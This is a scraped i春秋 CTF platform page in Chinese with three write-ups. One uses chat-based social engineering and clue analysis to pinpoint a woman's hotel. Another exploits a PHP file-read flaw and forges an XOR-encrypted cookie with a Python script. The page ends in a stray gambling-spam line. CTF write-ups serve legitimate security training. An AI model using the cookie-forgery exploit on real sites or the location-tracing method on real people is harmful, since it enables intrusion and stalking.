<code id="1xwv0"></code><center id="1xwv0"></center>
      <strike id="1xwv0"><sup id="1xwv0"></sup></strike>

      <del id="1xwv0"></del>
      <code id="1xwv0"></code>

        <th id="1xwv0"><video id="1xwv0"><acronym id="1xwv0"></acronym></video></th>
      1. <th id="1xwv0"><sup id="1xwv0"></sup></th>
      2. 未開啟cookie無法登錄使用i春秋的完整服務,請設置開啟瀏覽器cookie

        進入企安殿 進入助教后臺

          Writeup分享查看全部>>

        1. 2015廣州強網杯女神在哪兒

          騙取到的手機截圖(問女神一般什么時候起床,然后女神隨手截了個鬧鐘圖過來)獲取信息:ap名: qthjfsbg...; 作息鬧鐘; 關注的城市天氣優雅的找出女神以上是和女神聊了兩到三天收集到的信息,此后的工作就是打開我的腦洞,開啟數據整理模式。獲取到的信息組合如下:2g,信號不好 -->縣份消費水平低 -->縣份山多 -->盆地有湖 -->可用百度地圖查找相似地十幾公里外就是海 -->判斷地理位置地理位置偏遠 -->遠離市區市里空氣不好 -->確定不在市區地方話嚴重 -->非本地人,地方話嚴重河對面熱鬧 -->縣被河貫穿酒店 -->非本地人山多,溫州有機場 -->溫州附近ap名:qthjfsbg... -->ap有利判斷作息:早8:20左右 -->了解作息,方便貼靠關注北京天氣 -->關注城市女神在南方的一個縣城里;因為提到河對面是比較熱鬧的,有可能女神所在的縣是被河貫穿的;所在地離海邊有一定距離;沒有機場;遠離市區;在酒店里住;四面環山。推論:女神在南方的一個縣城里;因為提到河對面是比較熱鬧的,有可能女神所在的縣是被河貫穿的;所在地離海邊有一定距離;沒有機場;遠離市區;在酒店里住;四面環山。這些基礎信息分析完,開始找出女神。等著我……1、搜索范圍推測:女神在浙江溫州一帶,我把地圖掏出來,根據“十幾公里外就是海”,我把100 公里以內的區域都算入推算范圍內由于定位是縣級,直接排除所有市級。2、縮小至縣酒店ap名:qthjfsbg首先我把酒店的ap命名規則這么猜測:某市某酒店、某市某縣某酒店之類的命名規則,然后把qthjfsbg 套入,把qt想成了錢塘。這也很符合百公里以內到海的地方,但是我排除了市級地方,那會不會是錢塘周邊的縣?于是查找錢塘周邊符合hj命名的縣。百度中輸入“錢塘hj”,結果都不符合我的要求,那就開始懷疑自己猜錯了。只能放棄放棄“錢塘”,重新思考。由于女神提到溫州,我從溫州周邊入手,再次把范圍縮小,離溫州海邊100公里以內的地區納入推測。女神提到了一項很重要的信息:周圍都是山,有湖,有河。于是我開啟了地圖的衛星地貌模式。在地圖的衛星地貌模式中,可以看到,既然有河,那最后是匯入到入海口的,所以我直接從入海口一路反推,發現一個地名為青田[qt]的縣。紅圈地方好象是開發得比較完善的區域,如果女神是在個縣,那就她就在紅圈的對岸。根據酒店ap顯示,青田縣后面是“hj”,是街道還是別的名稱?放大地圖找了半天也沒找到符合hj的街道,陷入沉思……此時,突然發現百度左側有個功能,可以看當地有什么住宿的地方。如果女神手機截屏顯示的是酒店ap,那我點地圖上的訂酒店,嘗試是否找到符合這個ap名稱的酒店。柳暗花明又一村!幸好小縣城酒店并不多,一家一家查找下來,果然發現了一家名為[青田皇家風尚賓館] 的住處鎖定女神下榻酒店!柳暗花明又一村!  flag{青田皇家風尚賓館}Writeup分享Writeup分享Writeup分享Writeup分享Writeup分享Writeup分享

          Crypto
          分享人:杜SIR 2339 2 19
        2. “百度杯”CTF比賽 九月場Code

          百度杯-九月場-code00x0打開賽題鏈接,發現題目鏈接可能存在文件讀取。于是嘗試輸入index.php。查看源碼,發現base64加密過的源代碼00x1講源代碼解密后如下:<?php   /**   * Created by PhpStorm.   * Date: 2015/11/16     * Time: 1:31       */          header('content-type:text/html;charset=utf-8');      if(! isset($_GET['jpg']))                header('Refresh:0;url=./index.php?jpg=hei.jpg');        $file = $_GET['jpg'];             echo '<title>file:'.$file.'</title>';           $file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);        $file = str_replace("config","_", $file);           $txt = base64_encode(file_get_contents($file));             echo "<img src='data:image/gif;base64,".$txt."'>/</img>";              /* * Can you find the flag file? * */?>00x2訪問:http://e11eec896ded4871a4ba2cfbbfdf566660cd0fb8ba5b4c97.changame.ichunqiu.com/.idea/workspace.xml發現存在fl3g_ichunqiu.php文件,猜測flag在里面仔細閱讀上面的源代碼,發現有一個替換,會將config替換成_00x3訪問:http://e11eec896ded4871a4ba2cfbbfdf566660cd0fb8ba5b4c97.changame.ichunqiu.com/index.php?jpg=fl3gconfigichuqiu.php得到一串加密后的源代碼,將其進行base64解密得到如下代碼<?php/** * Created by PhpStorm. * Date: 2015/11/16 * Time: 1:31 */error_reporting(E_ALL || ~E_NOTICE);include('config.php');function random($length, $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz') {    $hash = '';    $max = strlen($chars) - 1;    for($i = 0; $i < $length; $i++) {        $hash .= $chars[mt_rand(0, $max)];    }    return $hash;}function encrypt($txt,$key){    for($i=0;$i<strlen($txt);$i++){        $tmp .= chr(ord($txt[$i])+10);    }    $txt = $tmp;    $rnd=random(4);    $key=md5($rnd.$key);    $s=0;    for($i=0;$i<strlen($txt);$i++){        if($s == 32) $s = 0;        $ttmp .= $txt[$i] ^ $key[++$s];    }    return base64_encode($rnd.$ttmp);}function decrypt($txt,$key){    $txt=base64_decode($txt);    $rnd = substr($txt,0,4);    $txt = substr($txt,4);    $key=md5($rnd.$key);    $s=0;    for($i=0;$i<strlen($txt);$i++){        if($s == 32) $s = 0;        $tmp .= $txt[$i]^$key[++$s];    }    for($i=0;$i<strlen($tmp);$i++){        $tmp1 .= chr(ord($tmp[$i])-10);    }    return $tmp1;}$username = decrypt($_COOKIE['user'],$key);if ($username == 'system'){    echo $flag;}else{    setcookie('user',encrypt('guest',$key));    echo "╮(╯▽╰)╭";}?>00x4通過閱讀代碼可以得知我們需要傳入cookie的值system來輸出flag。由加密函數我們可以得出key值,然后我們在進行加密即可。代碼如下import base64import requestsimport stringcrypt = 'Y0o1dUJLC01N'text = 'guest'crypt = base64.b64decode(crypt)rnd = crypt[0:4]crypt = crypt[4:] tmp = ''for i in range(5):    tmp += chr(ord(text[i]) + 10)key = ''for i in range(5):    key += chr(ord(tmp[i]) ^ ord(crypt[i]))cookies = []system = 'system'tt = ''for i in range(6):    tt += chr(ord(system[i]) + 10)for i in '0123456789abcdef':        #這里為啥是"1-f",因為md5最終返回的數值是16進制對應的字符是0~9 a~f,所以這里范圍為這一段    true_key = key + i    tmp = ''    for i in range(6):        tmp += chr(ord(true_key[i]) ^ ord(tt[i]))    cookies.append(base64.b64encode(rnd + tmp))for i in cookies:    cookie = {'user' : i}    r = requests.session()    result = r.get('http://16f8b7fc777444e38af9e234404cec95d069d121e5d7435a.game.ichunqiu.com/fl3g_ichuqiu.php', cookies = cookie)    print result.text運行代碼成功獲取flag.總結1.PhpStorm使用phpstorm 創建的文件里面會有一個.idea文件夾,里面存儲這一個配置文件其中workspace.xml可以顯示網站的大致結構。2.base64_decode($str)功能:對base64編碼的數據進行解碼例子:代碼如下<?php$str = 'VGhpcyBpcyBhbiBlbmNvZGVkIHN0cmluZw==';echo base64_decode($str);?>輸出結果:This is an encoded string3.".= " 作用連接兩個字符串4.MD5加密產生的32位是由0-f組合的。5.異或:A = C^B 那么 B = A ^ C6.爬蟲獲取代碼 cookie = {'user' : i}    r = requests.session()    result = r.get('http://16f8b7fc777444e38af9e234404cec95d069d121e5d7435a.game.ichunqiu.com/fl3g_ichuqiu.php', cookies = cookie)    print result.text7.隊列的操作cookies.append(base64.b64encode(rnd + tmp))隊列添加元素。Writeup分享Writeup分享Writeup分享Writeup分享Writeup分享Writeup分享

          Web
          分享人:許胖胖 1984 0 6
        3. 2016全國大學生信息安全競賽你好,i春秋

          首先關注公眾號->回復CTF->關注了->星期一到星期天全發一遍總有一個可以->你好->是->不愿意Writeup分享Writeup分享Writeup分享Writeup分享Writeup分享Writeup分享

          Misc
          分享人:睡前在看一分鐘 615 0 0

          2018賽季網絡安全競賽排名 查看排名規則>>

          關于CTF大本營

          CTF大本營意在為網絡安全愛好者提供最新、最全的比賽資訊、比賽練習題、解題分享等信息。同時,i春秋致力于打造最好的網絡安全競賽平臺,目前我們已推出了5種競賽模式,最多可支持千人同時在線競技,具體詳情請【點擊查看】

          聯系電話 400-8818-293 聯系QQ 2097706690 聯系郵箱 ctfgame@ichunqiu.com
        香港王中王论坛资枓香港正香